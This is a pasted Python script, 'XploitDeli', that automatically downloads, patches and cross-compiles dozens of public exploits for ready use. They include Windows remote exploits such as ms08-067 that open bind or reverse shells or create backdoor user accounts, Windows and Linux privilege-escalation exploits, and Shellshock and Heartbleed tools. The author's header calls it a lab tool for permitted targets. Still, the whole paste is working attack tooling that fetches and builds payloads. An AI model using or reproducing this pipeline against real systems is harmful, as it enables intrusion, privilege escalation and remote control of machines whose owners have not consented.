Advertisement
Guest User

Untitled

a guest
Jun 29th, 2018
528
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 34.23 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. ###################################################
  4. #
  5. #   XploitDeli - written by Justin Ohneiser
  6. # ------------------------------------------------
  7. # This program produces a variety of exploits
  8. # found on exploit-db for immediate use.
  9. #
  10. # Note: options with an asterisk either don't work
  11. # or require compilation on the target.
  12. #
  13. # [Warning]:
  14. # This script comes as-is with no promise of functionality or accuracy.  I strictly wrote it for personal use
  15. # I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
  16. # functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
  17. # target machines in a lab environment so please only use it against systems for which you have permission!!
  18. #-------------------------------------------------------------------------------------------------------------
  19. # [Modification, Distribution, and Attribution]:
  20. # You are free to modify and/or distribute this script as you wish.  I only ask that you maintain original
  21. # author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
  22. # worth anything anyway :)
  23. #
  24. # Designed for use in Kali Linux 4.6.0-kali1-686
  25. ###################################################
  26.  
  27. import sys, os, subprocess
  28.  
  29. # ------------------------------------
  30. # WINDOWS REMOTE
  31. # ------------------------------------
  32.  
  33. def windows_exploit_suggester():
  34.   commands = [
  35.     ('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
  36.     ('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
  37.     ('Updating...','./windows-exploit-suggester.py -u'),
  38.     ('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master')
  39.   ]
  40.   if run(commands):
  41.     printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
  42.  
  43. def ms03_026():
  44.   commands = [
  45.     ('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
  46.     ('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
  47.     ('Cleaning up...','rm ms03-026.c')
  48.   ]
  49.   if run(commands):
  50.     printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
  51.  
  52. def ms03_039_1():
  53.   commands = [
  54.     ('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
  55.     ('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
  56.     ('Cleaning up...','rm ms03-039.c')
  57.   ]
  58.   if run(commands):
  59.     printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
  60.  
  61. def ms03_039_2():
  62.   commands = [
  63.     ('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
  64.     ('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
  65.     ('Cleaning up...','rm ms03-039.cpp')
  66.   ]
  67.   if run(commands):
  68.     printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
  69.  
  70. def ms03_049():
  71.   commands = [
  72.     ('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
  73.     ('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
  74.     ('Cleaning up...','rm ms03-049.c')
  75.   ]
  76.   if run(commands):
  77.     printGood("ms03-039.exe successfully created\n\t - spawns bind shell on port 5555")
  78.  
  79. def ms04_007():
  80.   commands = [
  81.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
  82.     ('Unpacking...','tar xvzf ms04-007.tar.gz'),
  83.     ('Cleaning up...','rm ms04-007.tar.gz')
  84.   ]
  85.   if run(commands):
  86.     printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
  87.  
  88. def ms04_011_sslbof():
  89.   commands = [
  90.     ('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
  91.     ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
  92.     ('Cleaning up...','rm ms04-011.c')
  93.   ]
  94.   if run(commands):
  95.     printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
  96.  
  97. def ms04_011_lsasarv():
  98.   commands = [
  99.     ('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
  100.     ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
  101.     ('Cleaning up...','rm ms04-011.c')
  102.   ]
  103.   if run(commands):
  104.     printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
  105.  
  106. def ms04_031():
  107.   commands = [
  108.     ('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
  109.     ('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
  110.     ('Cleaning up...','rm ms04-031.c')
  111.   ]
  112.   if run(commands):
  113.     printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
  114.  
  115. def ms05_017():
  116.   commands = [
  117.     ('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
  118.     ('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
  119.     ('Cleaning up...','rm ms05-017.c')
  120.   ]
  121.   if run(commands):
  122.     printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
  123.  
  124. def ms05_039():
  125.   commands = [
  126.     ('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
  127.     ('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
  128.     ('Cleaning up...','rm ms05-039.c')
  129.   ]
  130.   if run(commands):
  131.     printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
  132.  
  133. def ms06_040_1():
  134.   commands = [
  135.     ('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
  136.     ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
  137.     ('Cleaning up...','rm ms06-040.c')
  138.   ]
  139.   if run(commands):
  140.     printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
  141.  
  142. def ms06_040_2():
  143.   commands = [
  144.     ('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
  145.     ('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
  146.     ('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
  147.     ('Cleaning up...','rm ms06-040.c')
  148.   ]
  149.   if run(commands):
  150.     printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
  151.  
  152. def ms06_070():
  153.   commands = [
  154.     ('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
  155.     ('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
  156.     ('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
  157.     ('Cleaning up...','rm ms06-070.c')
  158.   ]
  159.   if run(commands):
  160.     printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
  161.  
  162. def ms08_067_1():
  163.   commands = [
  164.     ('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
  165.     ('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
  166.     ('Cleaning up...','rm ms08-067.c')
  167.   ]
  168.   if run(commands):
  169.     printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
  170.  
  171. def ms08_067_2():
  172.   commands = [
  173.     ('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
  174.     ('Preparing...','chmod 744 ms08-067.py')
  175.   ]
  176.   if run(commands):
  177.     printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
  178.  
  179. def ms08_067_3():
  180.   commands = [
  181.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
  182.     ('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
  183.     ('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067')
  184.   ]
  185.   if run(commands):
  186.     printGood("ms08-067.exe successfully created\n\t")
  187.  
  188. def ms09_050():
  189.   commands = [
  190.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
  191.     ('Unpacking...','unzip ms09-050.zip'),
  192.     ('Cleaning up...','rm ms09-050.zip'),
  193.     ('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32')
  194.   ]
  195.   if run(commands):
  196.     printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
  197.  
  198. exploits_windows_remote = [
  199.   ("windows_exploit_suggester"  ,   windows_exploit_suggester),
  200.   ("ms03-026"   ,   ms03_026),
  201.   ("ms03-039 (1)"   ,   ms03_039_1),
  202.   ("ms03-039 (2)"   ,   ms03_039_2),
  203.   ("*ms03-049"  ,   ms03_049),
  204.   ("ms04-007"   ,   ms04_007),
  205.   ("ms04-011 - ssl bof"     ,   ms04_011_sslbof),
  206.   ("ms04-011 - lsasarv.dll" ,   ms04_011_lsasarv),
  207.   ("ms04-031"   ,   ms04_031),
  208.   ("ms05-017"   ,   ms05_017),
  209.   ("ms05-039"   ,   ms05_039),
  210.   ("*ms06-040 (1)"   ,   ms06_040_1),
  211.   ("ms06-040 (2)"   ,   ms06_040_2),
  212.   ("ms06-070"   ,   ms06_070),
  213.   ("*ms08-067 (1)"   ,   ms08_067_1),
  214.   ("ms08-067 (2)"   ,   ms08_067_2),
  215.   ("ms08-067 (3)"   ,   ms08_067_3),
  216.   ("*ms09-050"   ,   ms09_050)
  217. ]
  218.  
  219. # ------------------------------------
  220. # WINDOWS LOCAL
  221. # ------------------------------------
  222.  
  223. def windows_privesc_check():
  224.   commands = [
  225.     ('Downloading...','wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
  226.     ('Unpacking','unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
  227.     ('Cleaning up...','rm windows-privesc-check.zip; rm -r windows-privesc-check-master')
  228.   ]
  229.   if run(commands):
  230.     printGood("windows-privesc-check2.exe successfully created")
  231.  
  232. def ms04_011_local():
  233.   commands = [
  234.     ('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
  235.     ('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
  236.     ('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
  237.     ('Cleaning up...','rm ms04-011.c')
  238.   ]
  239.   if run(commands):
  240.     printGood("ms04-011.exe successfully created\n\t")
  241.  
  242. def ms04_019_1():
  243.   commands = [
  244.     ('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
  245.     ('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
  246.     ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
  247.     ('Cleaning up...','rm ms04-019.c')
  248.   ]
  249.   if run(commands):
  250.     printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
  251.  
  252. def ms04_019_2():
  253.   commands = [
  254.     ('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
  255.     ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
  256.     ('Cleaning up...','rm ms04-019.c')
  257.   ]
  258.   if run(commands):
  259.     printGood("ms04-019.exe successfully created\n\t")
  260.  
  261. def ms04_019_3():
  262.   commands = [
  263.     ('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
  264.     ('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
  265.     ('Cleaning up...','rm ms04-019.c')
  266.   ]
  267.   if run(commands):
  268.     printGood("ms04-019.exe successfully created\n\t")
  269.  
  270. def ms04_020():
  271.   commands = [
  272.     ('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
  273.     ('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
  274.     ('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
  275.     ('Cleaning up...','rm ms04-020.c')
  276.   ]
  277.   if run(commands):
  278.     printGood("ms04-020.exe successfully created\n\t")
  279.  
  280. def keybd():
  281.   commands = [
  282.     ('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'),
  283.     ('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
  284.     ('Cleaning up...','rm keybd.c')
  285.   ]
  286.   if run(commands):
  287.     printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
  288.  
  289. def ms05_018():
  290.   commands = [
  291.     ('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
  292.     ('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
  293.     ('Cleaning up...','rm ms05-018.c')
  294.   ]
  295.   if run(commands):
  296.     printGood("ms05-018.exe successfully created\n\t")
  297.  
  298. def ms05_055():
  299.   commands = [
  300.     ('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
  301.     ('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
  302.     ('Cleaning up...','rm ms05-055.c')
  303.   ]
  304.   if run(commands):
  305.     printGood("ms05-055.exe successfuly created\n\t")
  306.  
  307. def ms06_030():
  308.   commands = [
  309.     ('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
  310.     ('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
  311.     ('Cleaning up...','rm ms06-030.c')
  312.   ]
  313.   if run(commands):
  314.     printGood("ms06-030.exe successfully created\n\t")
  315.  
  316. def ms06_049():
  317.   commands = [
  318.     ('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
  319.     ('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
  320.     ('Cleaning up...','rm ms06-049.c')
  321.   ]
  322.   if run(commands):
  323.     printGood("ms06-049.exe successfully created\n\t")
  324.  
  325. def spool():
  326.   commands = [
  327.     ('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'),
  328.     ('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
  329.     ('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'),
  330.     ('Cleaning up...','rm spool.c')
  331.   ]
  332.   if run(commands):
  333.     printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
  334.  
  335. def ms08_025():
  336.   commands = [
  337.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
  338.     ('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
  339.     ('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
  340.     ('Cleaning up...','rm ms08-025.zip; rm -r ms08-025')
  341.   ]
  342.   if run(commands):
  343.     printGood("ms08_025.exe successfully created\n\t")
  344.  
  345. def netdde():
  346.   commands = [
  347.     ('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'),
  348.     ('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
  349.     ('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
  350.     ('Cleaning up...','rm netdde.c')
  351.   ]
  352.   if run(commands):
  353.     printGood("netdde.exe successfully created\n\t")
  354.  
  355. def ms10_015():
  356.   commands = [
  357.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
  358.     ('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
  359.     ('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D')
  360.   ]
  361.   if run(commands):
  362.     printGood("ms10-015.exe successfully created\n\t")
  363.  
  364. def ms10_059():
  365.   commands = [
  366.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
  367.     ('Unpacking...','unzip ms10-059.zip'),
  368.     ('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
  369.     ('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri')
  370.   ]
  371.   if run(commands):
  372.     printGood("ms10-059.exe successfully created\n\t")
  373.  
  374. def ms10_092():
  375.   commands = [
  376.     ('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
  377.   ]
  378.   if run(commands):
  379.     printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
  380.  
  381. def ms11_080():
  382.   commands = [
  383.     ('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
  384.     ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
  385.     ('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec')
  386.   ]
  387.   if run(commands):
  388.     printGood("ms11_080.exe successfully created\n\t")
  389.  
  390. def ms14_040():
  391.   commands = [
  392.     ('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
  393.     ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
  394.     ('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec')
  395.   ]
  396.   if run(commands):
  397.     printGood("ms14-040.exe successfully created")
  398.  
  399. def ms14_058_1():
  400.   commands = [
  401.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
  402.     ('Unpacking...','unzip ms14-058.zip'),
  403.     ('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
  404.     ('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX')
  405.   ]
  406.   if run(commands):
  407.     printGood("")
  408.  
  409. def ms14_058_2():
  410.   commands = [
  411.     ('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
  412.     ('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
  413.     ('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec')
  414.   ]
  415.   if run(commands):
  416.     printGood("ms14-058.exe successfully created\n\t")
  417.  
  418. def ms14_070_1():
  419.   commands = [
  420.     ('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
  421.     ('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
  422.     ('Cleaning up...','rm ms14-070.c')
  423.   ]
  424.   if run(commands):
  425.     printGood("ms14-070.exe successfully created\n\t")
  426.  
  427. def ms14_070_2():
  428.   commands = [
  429.     ('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
  430.     ('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'')
  431.   ]
  432.   run(commands)
  433.  
  434. def ms15_010_1():
  435.   commands = [
  436.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
  437.     ('Unpacking...','unzip ms15_010.zip'),
  438.     ('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
  439.     ('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
  440.     ('Cleaning up...','rm ms15_010.zip; rm -r 39035')
  441.   ]
  442.   if run(commands):
  443.     printGood("ms15-010.exe successfully created\n\t")
  444.  
  445. def ms15_010_2():
  446.   commands = [
  447.     ('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
  448.     ('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
  449.     ('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
  450.     ('Cleaning up...','rm ms15-010.cpp')
  451.   ]
  452.   if run(commands):
  453.     printGood("ms15-010.exe successfully created")
  454.  
  455. def ms15_051():
  456.   commands = [
  457.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe')
  458.   ]
  459.   if run(commands):
  460.     printGood("ms15-051_32.exe and ms15_051_64.exe successfully created")
  461.  
  462. def ms16_014():
  463.   commands = [
  464.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
  465.     ('Unpacking...','unzip ms16-014.zip'),
  466.     ('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
  467.     ('Cleaning up...','rm -r ms16-014.zip __MACOSX')
  468.   ]
  469.   if run(commands):
  470.     printGood("ms16-014.exe successfully created")
  471.  
  472. def ms16_016():
  473.   commands = [
  474.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
  475.     ('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
  476.     ('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX')
  477.   ]
  478.   if run(commands):
  479.     printGood("ms16_016.exe and Shellcode.dll successfully created")
  480.  
  481. def ms16_032():
  482.   commands = [
  483.     ('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1')
  484.   ]
  485.   if run(commands):
  486.     printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
  487.  
  488. exploits_windows_local = [
  489.   ("windows-privesc-check"  ,   windows_privesc_check),
  490.   ("ms04-011"   ,   ms04_011_local),
  491.   ("ms04-019 (1)"   ,   ms04_019_1),
  492.   ("ms04-019 (2)"   ,   ms04_019_2),
  493.   ("ms04-019 (3)"   ,   ms04_019_3),
  494.   ("ms04-020"   ,   ms04_020),
  495.   ("*keybd_event"    ,   keybd),
  496.   ("*ms05-018"   ,   ms05_018),
  497.   ("*ms05-055"   ,   ms05_055),
  498.   ("ms06-030"   ,   ms06_030),
  499.   ("ms06-049"   ,   ms06_049),
  500.   ("print spool service"  ,   spool),
  501.   ("*ms08-025"   ,   ms08_025),
  502.   ("netdde"     ,   netdde),
  503.   ("ms10-015"   ,   ms10_015),
  504.   ("ms10-059"   ,   ms10_059),
  505.   ("ms10-092"   ,   ms10_092),
  506.   ("ms11-080"   ,   ms11_080),
  507.   ("ms14-040"   ,   ms14_040),
  508.   ("*ms14-058 (1)"   ,   ms14_058_1),
  509.   ("ms14-058 (2)"   ,   ms14_058_2),
  510.   ("*ms14-070 (1)"   ,   ms14_070_1),
  511.   ("ms14-070 (2)"   ,   ms14_070_2),
  512.   ("*ms15-010 (1)"   ,   ms15_010_1),
  513.   ("*ms15-010 (2)"   ,   ms15_010_2),
  514.   ("ms15-051"   ,   ms15_051),
  515.   ("*ms16-014"   ,   ms16_014),
  516.   ("ms16-016"   ,   ms16_016),
  517.   ("ms16-032"   ,   ms16_032)
  518. ]
  519.  
  520. # ------------------------------------
  521. # LINUX REMOTE
  522. # ------------------------------------
  523.  
  524. def shellshock():
  525.   commands = [
  526.     ('Downloading...','wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
  527.     ('Preparing...','chmod 744 shellshock.py')
  528.   ]
  529.   if run(commands):
  530.     printGood("shellshock.py successfully created\n\t")
  531.  
  532. def heartbleed():
  533.   commands = [
  534.     ('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
  535.     ('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
  536.     ('Cleaning up...','rm heartbleed.c')
  537.   ]
  538.   if run(commands):
  539.     printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
  540.  
  541. exploits_linux_remote = [
  542.   ("shellshock"     ,   shellshock),
  543.   ("heartbleed"     ,   heartbleed)
  544. ]
  545.  
  546. # ------------------------------------
  547. # LINUX LOCAL
  548. # -- These should be compiled on target if possible
  549. # ------------------------------------
  550.  
  551. def linux_exploit_suggester():
  552.   commands = [
  553.     ('Downloading...','apt-get install linux-exploit-suggester'),
  554.     ('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl')
  555.   ]
  556.   if run(commands):
  557.     printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
  558.  
  559. def unix_privesc_check():
  560.   commands = [
  561.     ('Downloading...','wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
  562.     ('Unpacking...','tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
  563.     ('Cleaning up...','rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4')
  564.   ]
  565.   if run(commands):
  566.     printGood("unix_privesc_check successfully created")
  567.  
  568. def sendpage_1():
  569.   commands = [
  570.     ('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
  571.     ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
  572.   ]
  573.   run(commands)
  574.  
  575. def sendpage_2():
  576.   commands = [
  577.     ('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
  578.     ('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
  579.   ]
  580.   run(commands)
  581.  
  582. def ftruncate():
  583.   commands = [
  584.     ('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
  585.     ('Compile with:','echo "gcc -o ftruncate ftruncate.c"'),
  586.     ('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""')
  587.   ]
  588.   run(commands)
  589.  
  590. def cap_sys_admin():
  591.   commands = [
  592.     ('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
  593.     ('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"')
  594.   ]
  595.   run(commands)
  596.  
  597. def compat():
  598.   commands = [
  599.     ('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'),
  600.     ('Compile with:','echo "gcc -o compat compat.c"')
  601.   ]
  602.   run(commands)
  603.  
  604. def can_bcm():
  605.   commands = [
  606.     ('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
  607.     ('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"')
  608.   ]
  609.   run(commands)
  610.  
  611. def rdsProtocol():
  612.   commands = [
  613.     ('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
  614.     ('Compile with:','echo "gcc -o rds_expl rds_expl.c"')
  615.   ]
  616.   run(commands)
  617.  
  618. def halfNelson():
  619.   commands = [
  620.     ('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
  621.     ('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"')
  622.   ]
  623.   run(commands)
  624.  
  625. def fullNelson():
  626.   commands = [
  627.     ('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
  628.     ('Compile with:','echo "gcc -o full-nelson full-nelson.c"')
  629.   ]
  630.   run(commands)
  631.  
  632. def udev():
  633.   commands = [
  634.     ('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
  635.     ('Compile with:','echo "gcc -o udev_expl udev_expl.c"')
  636.   ]
